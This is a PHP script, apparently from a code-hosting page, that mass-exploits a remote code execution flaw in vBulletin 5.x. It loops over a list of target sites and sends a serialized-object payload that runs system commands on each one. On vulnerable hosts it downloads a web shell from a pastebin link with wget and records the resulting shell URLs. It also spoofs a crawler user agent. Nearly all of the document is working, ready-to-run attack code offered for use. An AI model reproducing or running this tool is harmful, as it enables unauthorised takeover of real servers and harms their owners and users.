-
Notifications
You must be signed in to change notification settings - Fork 5
/
vbulletin 5.x Rce upload shell Mass exploiting[PHP]
101 lines (92 loc) · 3.87 KB
/
vbulletin 5.x Rce upload shell Mass exploiting[PHP]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
<?php
error_reporting(0);
set_time_limit(0);
print "
____ _ _ _ _ _____
| _ \ | | | | | (_) | __ \
__ _| |_) |_ _| | | ___| |_ _ _ __ | |__) |___ ___
\ \ / / _ <| | | | | |/ _ \ __| | '_ \ | _ // __/ _ \
\ V /| |_) | |_| | | | __/ |_| | | | | | | \ \ (_| __/
\_/ |____/ \__,_|_|_|\___|\__|_|_| |_| |_| \_\___\___| v.5.x
Tool coded by Mr.MaGnoM => Magsec.blogspot.com
The hacker make tool not tool make hacker (dont change rights)
usage php script.php list.txt => greetz all my friends :)
";
// if u change any Character in tool will not wrok :) dont change any think and shell link is : http://pastebin.com/raw.php?i=jxWrCM4B
// shells uploaded will save in results.txt only shells
// and i want say is hard to upload sheel cause of permission 99% of site u cant upload shell but try with ur chance
// for contact me : https://www.facebook.com/mr.magnom2
//echo "\n\t"."usage : php $argv[0] list.txt"."\n\n";
$m=file_get_contents($argv[1]);
$e=explode("\r\n",$m);
$open=fopen("results.html","a+");
foreach ($e as $link){
echo "\n [+] Scanning ==> ".$link."\n";
check($link);
}
function inf($ur){
$expt2='/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:50:"whoami;echo%20:::;id;echo%20:::;uname%20-a;echo%20:::;pwd;";}';
//$urlsk="$url/ajax/api/hook/decodeArguments?";
$urls2=($ur).($expt2);
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "$urls2");
curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$data = curl_exec($ch);
curl_close($ch);
$sd=explode(":::\n",$data);
echo "\t [+] whoami :$sd[0]";
echo "\t [+] id :$sd[1]";
echo "\t [+] uname :$sd[2]";
echo "\t [+] pwd :$sd[3]";
}
function shell($url){
global $open;
$expt='/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:57:"wget%20http://pastebin.com/raw.php?i=jxWrCM4B%20-O%20magnom.php";}';
//$urlsk="$url/ajax/api/hook/decodeArguments?";
$urls=($url).($expt);
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "$urls");
curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$data = curl_exec($ch);
curl_close($ch);
$sf="$url/magnom.php";
$geg=@file_get_contents($sf);
if(eregi("magnom",$geg)){
echo "\t [+] Upload Shell Method : Success => $url/magnom.php \n";fwrite($open,"$url/magnom.php?mr=magnom<br>");
}else{
echo "\t [+] Shell : Fail Cant bypass permession \n";
}
}
function check($url){
$expt='/ajax/api/hook/decodeArguments?arguments=O:12:%22vB_dB_Result%22:2:{s:5:%22%00*%00db%22;O:11:%22vB_Database%22:1:{s:9:%22functions%22;a:1:{s:11:%22free_result%22;s:6:%22system%22;}}s:12:%22%00*%00recordset%22;s:11:%22echo%20magnom%22;}';
//$urlsk="$url/ajax/api/hook/decodeArguments?";
$urls=($url).($expt);
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "$urls");
curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$data = curl_exec($ch);
curl_close($ch);
/*
echo "\n";
print $data;
echo "\n";
*/
if (preg_match("#magnom#",$data) and strlen($data)<50){
echo "\t[+] Vul : yes \n";
inf($url);
shell($url);
}else{
echo "\t[+] Vul : No \n";
}
}
fclose($open);
?>